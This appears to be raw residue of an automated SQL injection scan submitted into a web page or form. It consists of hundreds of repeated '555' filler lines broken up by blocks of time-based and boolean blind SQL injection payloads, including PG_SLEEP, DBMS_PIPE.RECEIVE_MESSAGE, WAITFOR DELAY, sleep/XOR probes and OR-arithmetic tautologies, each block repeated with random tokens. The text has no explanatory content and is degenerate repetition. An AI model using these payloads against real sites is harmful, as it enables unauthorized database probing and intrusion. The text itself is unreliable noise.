555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@9na4X
555
1′”
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
gjcK5sZ3′)) OR 421=(SELECT 421 FROM PG_SLEEP(15))–
555
555
HHpd2VIY’) OR 142=(SELECT 142 FROM PG_SLEEP(15))–
555
uJyJ6wOA’ OR 25=(SELECT 25 FROM PG_SLEEP(15))–
555
-1)) OR 570=(SELECT 570 FROM PG_SLEEP(15))–
555
-5) OR 460=(SELECT 460 FROM PG_SLEEP(15))–
555
-5 OR 934=(SELECT 934 FROM PG_SLEEP(15))–
555
TVKvdiFM’; waitfor delay ‘0:0:15’ —
555
1 waitfor delay ‘0:0:15’ —
555
-1); waitfor delay ‘0:0:15’ —
555
-1; waitfor delay ‘0:0:15’ —
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
555
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
555
if(now()=sysdate(),sleep(15),0)
555
-1″ OR 2+189-189-1=0+0+0+1 —
-1′ OR 2+129-129-1=0+0+0+1 or ‘WShOjqIP’=’
555
555
-1′ OR 2+792-792-1=0+0+0+1 —
555
-1 OR 2+386-386-1=0+0+0+1
555
-1 OR 2+231-231-1=0+0+0+1 —
555
MN6HNgb4
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@9ixnp
555
1′”
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
8MKwcJcN’)) OR 842=(SELECT 842 FROM PG_SLEEP(15))–
555
WHQfeSoA’) OR 311=(SELECT 311 FROM PG_SLEEP(15))–
555
7RW4naiq’ OR 872=(SELECT 872 FROM PG_SLEEP(15))–
555
-1)) OR 678=(SELECT 678 FROM PG_SLEEP(15))–
555
-5) OR 489=(SELECT 489 FROM PG_SLEEP(15))–
555
-5 OR 885=(SELECT 885 FROM PG_SLEEP(15))–
555
bmcH7nJr’; waitfor delay ‘0:0:15’ —
555
1 waitfor delay ‘0:0:15’ —
555
555
-1); waitfor delay ‘0:0:15’ —
555
555
555
555
-1; waitfor delay ‘0:0:15’ —
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555
555
555
555
555
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
555
555
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
555
555
555
555
if(now()=sysdate(),sleep(15),0)
555
555
555
-1″ OR 2+655-655-1=0+0+0+1 —
555
-1′ OR 2+485-485-1=0+0+0+1 or ‘mT0AYsb1’=’
555
-1′ OR 3*2>(0+5+419-419) —
-1′ OR 3*2<(0+5+419-419) —
-1′ OR 3+419-419-1=0+0+0+1 —
555
555
555
555
-1′ OR 2+419-419-1=0+0+0+1 —
-1 OR 2+672-672-1=0+0+0+1
555
555
-1 OR 2+187-187-1=0+0+0+1 —
34qN2A8L
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@GRJgX
555
1′”
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
@@ICMnp
555
1′”
555
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
9gZqkLB4′)) OR 51=(SELECT 51 FROM PG_SLEEP(15))–
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
CK5TFxdT’) OR 302=(SELECT 302 FROM PG_SLEEP(15))–
555
555
555
555
555
555
g56JkjOM’)) OR 782=(SELECT 782 FROM PG_SLEEP(15))–
555
555
o4VFzqla’ OR 47=(SELECT 47 FROM PG_SLEEP(15))–
555
555
1lId9rPp’) OR 371=(SELECT 371 FROM PG_SLEEP(15))–
555
-1)) OR 869=(SELECT 869 FROM PG_SLEEP(15))–
555
555
dugHCv6y’ OR 658=(SELECT 658 FROM PG_SLEEP(15))–
555
555
-5) OR 111=(SELECT 111 FROM PG_SLEEP(15))–
555
555
-1)) OR 163=(SELECT 163 FROM PG_SLEEP(15))–
555
555
555
555
-5 OR 627=(SELECT 627 FROM PG_SLEEP(15))–
555
555
555
-5) OR 808=(SELECT 808 FROM PG_SLEEP(15))–
555
5ui5rZ3r’; waitfor delay ‘0:0:15’ —
555
555
555
555
555
555
555
-5 OR 985=(SELECT 985 FROM PG_SLEEP(15))–
555
555
1 waitfor delay ‘0:0:15’ —
555
555
555
555
555
j31INjHd’; waitfor delay ‘0:0:15’ —
-1); waitfor delay ‘0:0:15’ —
555
555
555
555
555
1 waitfor delay ‘0:0:15’ —
555
555
-1; waitfor delay ‘0:0:15’ —
555
555
555
555
555
-1); waitfor delay ‘0:0:15’ —
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555
555
555
555
555
-1; waitfor delay ‘0:0:15’ —
555
555
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
555
555
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
555
@@WMvyC
555
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
1′”
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
if(now()=sysdate(),sleep(15),0)
555
555
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
-1″ OR 2+504-504-1=0+0+0+1 —
-1′ OR 2+64-64-1=0+0+0+1 or ‘gPd9InTO’=’
555
555
-1′ OR 2+398-398-1=0+0+0+1 —
-1 OR 2+419-419-1=0+0+0+1
if(now()=sysdate(),sleep(15),0)
-1 OR 2+569-569-1=0+0+0+1 —
aPCxMAsy’)) OR 591=(SELECT 591 FROM PG_SLEEP(15))–
jmrPdSVV
555
555
555
-1″ OR 2+10-10-1=0+0+0+1 —
cXi9iVzF’) OR 104=(SELECT 104 FROM PG_SLEEP(15))–
-1′ OR 2+951-951-1=0+0+0+1 or ‘P9N4IfyS’=’
555
-1′ OR 2+466-466-1=0+0+0+1 —
555
-1 OR 2+886-886-1=0+0+0+1
555
-1 OR 2+284-284-1=0+0+0+1 —
DjTgS1qG
555
7pnF8nzQ’ OR 731=(SELECT 731 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
555
555
555
-1)) OR 588=(SELECT 588 FROM PG_SLEEP(15))–
555
555
555
555
555
-5) OR 497=(SELECT 497 FROM PG_SLEEP(15))–
555
555
555
555
555
-5 OR 756=(SELECT 756 FROM PG_SLEEP(15))–
555
555
555
555
555
555
fxpXT9YS’; waitfor delay ‘0:0:15’ —
555
555
555
555
555
555
555
1 waitfor delay ‘0:0:15’ —
555
555
555
-1); waitfor delay ‘0:0:15’ —
555
555
555
-1; waitfor delay ‘0:0:15’ —
555
555
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
@@s6Kh1
555
1′”
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
555
555
kIIwZv6Q’)) OR 309=(SELECT 309 FROM PG_SLEEP(15))–
555
555
555
555
555
if(now()=sysdate(),sleep(15),0)
jVmDTclz’) OR 733=(SELECT 733 FROM PG_SLEEP(15))–
555
555
-1″ OR 2+632-632-1=0+0+0+1 —
-1′ OR 2+19-19-1=0+0+0+1 or ‘pcLTIupC’=’
-1′ OR 2+416-416-1=0+0+0+1 —
FlRdRmkC’ OR 737=(SELECT 737 FROM PG_SLEEP(15))–
-1 OR 2+899-899-1=0+0+0+1
-1 OR 2+72-72-1=0+0+0+1 —
sP6XIFgH
555
555
-1)) OR 103=(SELECT 103 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
-5) OR 21=(SELECT 21 FROM PG_SLEEP(15))–
555
555
555
555
555
-5 OR 171=(SELECT 171 FROM PG_SLEEP(15))–
555
555
555
555
c8L09TAM’; waitfor delay ‘0:0:15’ —
555
555
1 waitfor delay ‘0:0:15’ —
555
555
555
555
555
-1); waitfor delay ‘0:0:15’ —
555
555
555
-1; waitfor delay ‘0:0:15’ —
555
555
555
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555
555
555
555
555
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
555
555
555
555
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
555
555
555
555
555
555
555
if(now()=sysdate(),sleep(15),0)
555
555
555
555
-1″ OR 2+887-887-1=0+0+0+1 —
-1′ OR 2+59-59-1=0+0+0+1 or ‘fRpJUPIH’=’
555
555
555
-1′ OR 2+390-390-1=0+0+0+1 —
555
-1 OR 2+364-364-1=0+0+0+1
555
-1 OR 2+284-284-1=0+0+0+1 —
555
555
DaK9nNv5
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@FVuq5
555
555
555
1′”
555
555
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
555
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
555
555
OLnGpHLp’)) OR 104=(SELECT 104 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
555
555
KqwfObQI’) OR 635=(SELECT 635 FROM PG_SLEEP(15))–
555
555
555
555
555
dGCNydII’ OR 841=(SELECT 841 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
555
555
555
555
555
-1)) OR 155=(SELECT 155 FROM PG_SLEEP(15))–
555
555
555
555
555
555
-5) OR 882=(SELECT 882 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
-5 OR 961=(SELECT 961 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
555
555
mDXumPrn’; waitfor delay ‘0:0:15’ —
555
555
555
555
555
555
555
555
555
555
555
1 waitfor delay ‘0:0:15’ —
555
555
555
555
555
555
-1); waitfor delay ‘0:0:15’ —
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1; waitfor delay ‘0:0:15’ —
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555
555
555
555
555
555
555
555
555
555
555
555
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
555
555
555
555
555
555
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
555
555
555
555
555
555
555
555
555
555
555
if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
555
555
-1″ OR 2+886-886-1=0+0+0+1 —
555
-1′ OR 2+280-280-1=0+0+0+1 or ‘w2okssDQ’=’
555
-1′ OR 2+161-161-1=0+0+0+1 —
555
555
-1 OR 2+204-204-1=0+0+0+1
555
-1 OR 2+14-14-1=0+0+0+1 —
4IDBpDcL
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@po8YJ
555
555
1′”
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
555
555
555
OW7GYDhc’)) OR 632=(SELECT 632 FROM PG_SLEEP(15))–
555
555
555
555
555
555
h75jP7Tb’) OR 167=(SELECT 167 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
U4wTxPCY’ OR 428=(SELECT 428 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
555
555
-1)) OR 22=(SELECT 22 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-5) OR 342=(SELECT 342 FROM PG_SLEEP(15))–
555
555
555
555
555
-5 OR 342=(SELECT 342 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
555
555
JVmgbij0′; waitfor delay ‘0:0:15’ —
555
555
555
555
555
555
555
555
555
555
555
1 waitfor delay ‘0:0:15’ —
555
555
555
555
555
555
555
555
-1); waitfor delay ‘0:0:15’ —
555
555
555
555
555
-1; waitfor delay ‘0:0:15’ —
555
555
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555
555
555
555
555
555
555
555
555
555
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
555
555
555
555
555
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
555
555
555
555
555
if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
-1″ OR 2+943-943-1=0+0+0+1 —
555
-1′ OR 2+159-159-1=0+0+0+1 or ‘UNmn9hjB’=’
555
-1′ OR 2+852-852-1=0+0+0+1 —
555
555
-1 OR 2+141-141-1=0+0+0+1
555
555
-1 OR 2+526-526-1=0+0+0+1 —
gfS34nOp
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@EtQLd
555
555
1′”
555
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
MNtjwwMS’)) OR 881=(SELECT 881 FROM PG_SLEEP(15))–
555
cApQOr7u’) OR 208=(SELECT 208 FROM PG_SLEEP(15))–
555
555
555
555
H5IM7i3V’ OR 995=(SELECT 995 FROM PG_SLEEP(15))–
555
555
555
555
555
-1)) OR 77=(SELECT 77 FROM PG_SLEEP(15))–
555
555
-5) OR 279=(SELECT 279 FROM PG_SLEEP(15))–
555
555
-5 OR 662=(SELECT 662 FROM PG_SLEEP(15))–
555
555
IcGxI8wA’; waitfor delay ‘0:0:15’ —
555
555
1 waitfor delay ‘0:0:15’ —
555
555
-1); waitfor delay ‘0:0:15’ —
555
555
-1; waitfor delay ‘0:0:15’ —
555
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555
555
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
555
555
555
555
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
555
555
555
555
if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
-1″ OR 2+136-136-1=0+0+0+1 —
-1′ OR 2+746-746-1=0+0+0+1 or ’84j7u4S9’=’
-1′ OR 2+986-986-1=0+0+0+1 —
-1 OR 2+752-752-1=0+0+0+1
-1 OR 2+386-386-1=0+0+0+1 —
KZxZLbKD
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@IXLdr
555
1′”
555
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
555
wmej3TLV’)) OR 738=(SELECT 738 FROM PG_SLEEP(15))–
555
555
555
555
555
555
ja3zlUez’) OR 751=(SELECT 751 FROM PG_SLEEP(15))–
555
555
555
555
DKniwV7L’ OR 529=(SELECT 529 FROM PG_SLEEP(15))–
555
555
555
555
555
-1)) OR 206=(SELECT 206 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
-5) OR 764=(SELECT 764 FROM PG_SLEEP(15))–
555
555
555
555
555
-5 OR 417=(SELECT 417 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
2gyHtsHa’; waitfor delay ‘0:0:15’ —
555
555
555
555
555
1 waitfor delay ‘0:0:15’ —
555
555
555
555
555
-1); waitfor delay ‘0:0:15’ —
555
555
555
555
-1; waitfor delay ‘0:0:15’ —
555
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555
555
555
555
555
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
555
555
555
555
555
555
555
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
555
555
555
555
if(now()=sysdate(),sleep(15),0)
555
555
555
555
-1″ OR 2+780-780-1=0+0+0+1 —
555
555
-1′ OR 2+506-506-1=0+0+0+1 or ‘fW7XnVI9’=’
555
555
-1′ OR 2+967-967-1=0+0+0+1 —
555
555
-1 OR 2+417-417-1=0+0+0+1
555
-1 OR 2+24-24-1=0+0+0+1 —
KXLxmmtK
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@z9Pwc
555
1′”
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
iVpb5qkn’)) OR 35=(SELECT 35 FROM PG_SLEEP(15))–
555
555
555
kl8r9Cc8′) OR 324=(SELECT 324 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
YNNz2hPp’ OR 404=(SELECT 404 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
-1)) OR 223=(SELECT 223 FROM PG_SLEEP(15))–
555
555
555
555
555
-5) OR 611=(SELECT 611 FROM PG_SLEEP(15))–
555
555
555
555
555
555
555
555
555
555
555
-5 OR 638=(SELECT 638 FROM PG_SLEEP(15))–
555
555
555